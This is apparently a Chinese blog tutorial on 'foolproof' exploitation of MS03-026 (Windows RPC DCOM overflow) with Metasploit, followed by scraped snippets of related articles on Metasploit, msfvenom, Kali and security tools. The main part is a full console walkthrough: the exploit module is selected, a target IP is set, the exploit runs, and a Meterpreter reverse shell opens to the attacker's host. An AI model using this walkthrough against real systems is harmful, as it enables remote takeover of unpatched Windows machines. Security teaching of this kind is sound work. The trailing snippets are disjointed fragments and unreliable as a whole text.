metasploit学习之ms03_026

傻瓜式利用ms03_026_dcom:

Matching Modules
================

Name Disclosure Date Rank Description
---- --------------- ---- -----------
auxiliary/scanner/telnet/telnet_ruggedcom normal RuggedCom Telnet Password Generator
exploit/windows/dcerpc/ms03_026_dcom 2003-07-16 great MS03-026 Microsoft RPC DCOM Interface Overflow
exploit/windows/smb/ms04_031_netdde 2004-10-12 good MS04-031 Microsoft NetDDE Service Overflow
exploit/windows/smb/psexec_psh 1999-01-01 manual Microsoft Windows Authenticated Powershell Command Execution

msf > use exploit/windows/dcerpc/ms03_026_dcom //设置漏洞代码
msf exploit(ms03_026_dcom) > show options

Module options (exploit/windows/dcerpc/ms03_026_dcom):

Name Current Setting Required Description
---- --------------- -------- -----------
RHOST yes The target address
RPORT 135 yes The target port

Exploit target:

Id Name
-- ----
0 Windows NT SP3-6a/2000/XP/2003 Universal

msf exploit(ms03_026_dcom) > set RHOST 10.0.0.5
RHOST => 10.0.0.5
msf exploit(ms03_026_dcom) > exploit

[*] Started reverse handler on 10.0.0.100:4444
[*] Trying target Windows NT SP3-6a/2000/XP/2003 Universal...
[*] Binding to 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:0.0@ncacn_ip_tcp:10.0.0.5[135] ...
[*] Bound to 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:0.0@ncacn_ip_tcp:10.0.0.5[135] ...
[*] Sending exploit ...
[*] Sending stage (770048 bytes) to 10.0.0.5
[*] Meterpreter session 1 opened (10.0.0.100:4444 -> 10.0.0.5:1231) at 2015-04-25 17:08:20 +0800

meterpreter >       //成功了!
时间: 2024-08-04 06:44:15

metasploit学习之ms03_026的相关文章

Metasploit 学习

知识准备:CCNA/CCNP基础计算机知识框架:操作系统.汇编.数据库.网络.安全 木马.灰鸽子.口令破解.用后门拷贝电脑文件 渗透测试工程师 penetration test engineer <Metasploit渗透测试指南>肯尼<Metasploit渗透测试魔鬼训练营>诸葛建伟<网络攻防技术与实践><黑客大曝光> linux下使用Metasploit用NAT模式 工具:BT5: 操作系统,包含各种各校不同作者编写的黑客攻击(安全审计)工具,从渗透前期

Metasploit学习之msf连接数据库

kali使用metasploit开启数据服务: 首先,初次使用系统要初始化建立数据库msf3, 否则的话 /opt/metasploit/apps/pro/ui/config/databse.yml不存在: /etc/init/metasploit start 查看postgres是否启动: netstat -tulnp | grep postgres 参看用户名和密码: # cat /opt/metasploit/apps/pro/ui/config/databse.yml 连接:

Metasploit学习笔记之——情报搜集

1.情报搜集 1.1外围信息搜索 1.1.1通过DNS和IP地址挖掘目标网络信息 (1)whois域名注冊信息查询(BT5.kali专有):[email protected]:~# whois testfire.net  s (2)nslookup与dig域名查询(查询域名相应的IP地址):msf > nslookup > set type=A > testfire.net msf > dig 注:nslookup仅仅能得到DNS解析server保存在Cache中的非权威解答,di

Metasploit学习笔记(一)

渗透测试过程环节: 1.前期交互阶段(Pre-Engagement Interaction),渗透测试团队与客户组织进行交互讨论,确定渗透范围.目标.限制条件以及服务合同细节. 2.情报收集阶段(Information Gathering),渗透测试团队利用各种信息来源与搜集技术方法,尝试获取更多目标组织网络拓扑.系统配置.与安全防御措施的信息,其包括:公开来源信息查询.Google Hacking.社会工程学.网络踩点.扫描探测.被动监听.服务查点等. 3.威胁建模阶段(Threat Mode

metasploit之msfvenom功能

有木有常常需要把msfpayload获得的内容通过R命令导入管道输出至msfencode中进行编码,有木有觉得这一切很麻烦, metasploit的开发人员早就想到了.msfvenom是msfpayload和msfencode的结合体,用起来更方便了. Usage:msfvenom [options] <var=val> Options:    -p, --payload    <payload>       Payload to use. Specify a '-' or std

检测一下你的专业指数:2015年十大测试工具你认识几个?

如果你真的喜欢安全,了解下面这些工具是你通往大神之路的必备良品,快来看看都有哪些工具并学习一下吧! 这份黑客工具列表中的一部分是基于 Kali Linux 的,其他的工具是通过我们的社区反馈的.下面介绍了这些工具的主要功能以及教程.书籍.视频等. 端口扫描器:Nmap Nmap 是"Network Mapper"的缩写,众所周知,它是一款非常受欢迎的免费开源黑客工具.Nmap 被用于发现网络和安全审计.据数据统计,全世界成千上万的系统管理员使用 nmap 发现网络.检查开放端口.管理服

kali安全的一些笔记

偶尔学习安全,作了一些笔记,比较乱,希望对大家有用 1.本机性能监控软件(目前可以分布式):zabbix   ./configure --prefix=  --enable-agent 2.linux主机型HIDS:OSSEC HIDS 3.kali linux初始化配置:http://www.linuxidc.com/Linux/2014-05/102206.htm http://xiao106347.blog.163.com/blog/static/215992078201342410347

【转载】安全测试常用工具

http://blog.csdn.net/huangjin0507/article/details/52453137 下面介绍了这些工具的主要功能以及教程.书籍.视频等. 端口扫描器:Nmap Nmap是"Network Mapper"的缩写,众所周知,它是一款非常受欢迎的免费开源黑客工具.Nmap被用于发现网络和安全审计.据数据统计,全世界成千上万的系统管理员使 用nmap发现网络.检查开放端口.管理服务升级计划,以及监视主机或服务的正常运行时间.Nmap是一种使用原始IP数据包的工

安全常用测试工具

端口扫描器:Nmap Nmap是"Network Mapper"的缩写,众所周知,它是一款非常受欢迎的免费开源黑客工具.Nmap被用于发现网络和安全审计.据数据统计,全世界成千上万的系统管理员使用nmap发现网络.检查开放端口.管理服务升级计划,以及监视主机或服务的正常运行时间.Nmap是一种使用原始IP数据包的工具,以非常创新的方式决定网络上有哪些主机,主机上的哪些服务(应用名称和版本)提供什么数据.什么操作系统.什么类型.什么版本的包过滤/防火墙正在被目标使用.使用nmap有什么好